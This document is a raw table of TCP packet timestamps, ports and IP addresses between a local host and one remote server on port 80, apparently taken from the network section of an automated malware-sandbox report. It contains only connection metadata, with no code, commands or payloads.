Nov 7, 2024 04:12:03.924350023 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924364090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924390078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924402952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924412012 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924427032 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924442053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924455881 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924458981 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924469948 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924487114 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924494982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924523115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924536943 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924573898 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924731016 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924746990 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924763918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924782991 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924802065 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924868107 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924902916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924918890 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924926996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924941063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924954891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924957037 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924964905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924968958 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924978971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924990892 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924993992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925009966 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925018072 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925023079 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925036907 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925051928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925055027 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925066948 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925085068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925086021 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925108910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925136089 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925215960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925262928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925273895 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925277948 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925298929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925304890 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925316095 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925332069 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925350904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925359011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925386906 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925389051 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925443888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925450087 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925460100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925476074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925493002 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925509930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925517082 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925524950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.925548077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.925584078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.928782940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928813934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928828955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928843021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928848028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.928858995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928878069 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.928881884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928898096 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928915024 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928917885 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.928941011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.928951979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928966045 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.928970098 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.928981066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929003000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929003954 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929018974 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929028988 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929033041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929050922 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929056883 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929081917 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929115057 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929280996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929303885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929318905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929327011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929332018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929344893 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929348946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929378986 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929410934 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929466009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929480076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929493904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929508924 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929508924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929523945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929539919 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929541111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929573059 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929594994 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929721117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929734945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929749966 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929775000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929780960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929795027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929799080 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929809093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929825068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929828882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929903030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929923058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929938078 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929949999 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929964066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929970980 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.929980040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.929994106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.930001974 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.930008888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.930021048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.930032015 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.930072069 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.930294037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.930305958 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.930341005 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.930354118 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.040745974 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.040812969 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077321053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077352047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077367067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077383041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077403069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077424049 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077425003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077440977 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077455044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077466011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077470064 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077492952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077507019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077512980 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077536106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077541113 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077559948 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077580929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077591896 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077603102 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077616930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077630997 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077635050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077639103 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077646971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077665091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077672958 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077680111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077692986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077707052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077713966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077719927 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077740908 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077742100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077765942 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077779055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077789068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077794075 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077806950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077809095 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077821970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077836990 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077845097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077858925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077867031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077873945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077877998 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077888012 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077914953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077928066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077929020 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077941895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077949047 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.077965021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.077989101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078000069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078001022 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078013897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078027964 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078037024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078047991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078062057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078066111 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078074932 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078097105 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078104019 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078108072 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078121901 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078135014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078138113 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078170061 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078191996 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078219891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078250885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078269958 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078298092 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078310013 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078353882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078372955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078385115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078397989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078421116 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078454018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078471899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078484058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078496933 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078512907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078526020 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078541040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078545094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078552961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078567028 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078571081 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078613997 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078624964 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078643084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078658104 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078666925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078670979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078686953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078700066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078701973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078732014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078752995 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.078933001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078947067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078960896 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.078994989 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079018116 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079094887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079112053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079127073 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079145908 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079159021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079174042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079185963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079189062 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079207897 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079210997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079222918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079236031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079236984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079253912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079262018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079274893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079289913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079298019 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079303026 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079322100 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079336882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079349995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079360962 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079364061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079380035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079396963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079397917 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079410076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079416990 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079432011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079446077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079446077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079468012 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079474926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079484940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079500914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079509020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079524040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079535961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079539061 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079555035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079566002 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079585075 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079598904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079607010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079624891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079633951 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079639912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079655886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079663992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079674006 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079679966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079687119 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079699993 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079730988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079742908 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079746008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079751968 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079761982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079777002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079782963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079791069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079821110 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079839945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079876900 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079889059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079901934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079915047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079929113 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079936981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079951048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079958916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079966068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079982996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.079994917 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.079997063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080001116 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080013990 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080049038 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080079079 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080079079 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080095053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080108881 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080118895 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080126047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080142021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080144882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080177069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080189943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080199957 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080213070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080228090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080235958 CET	49730	80	192.168.2.4	185.215.113.206
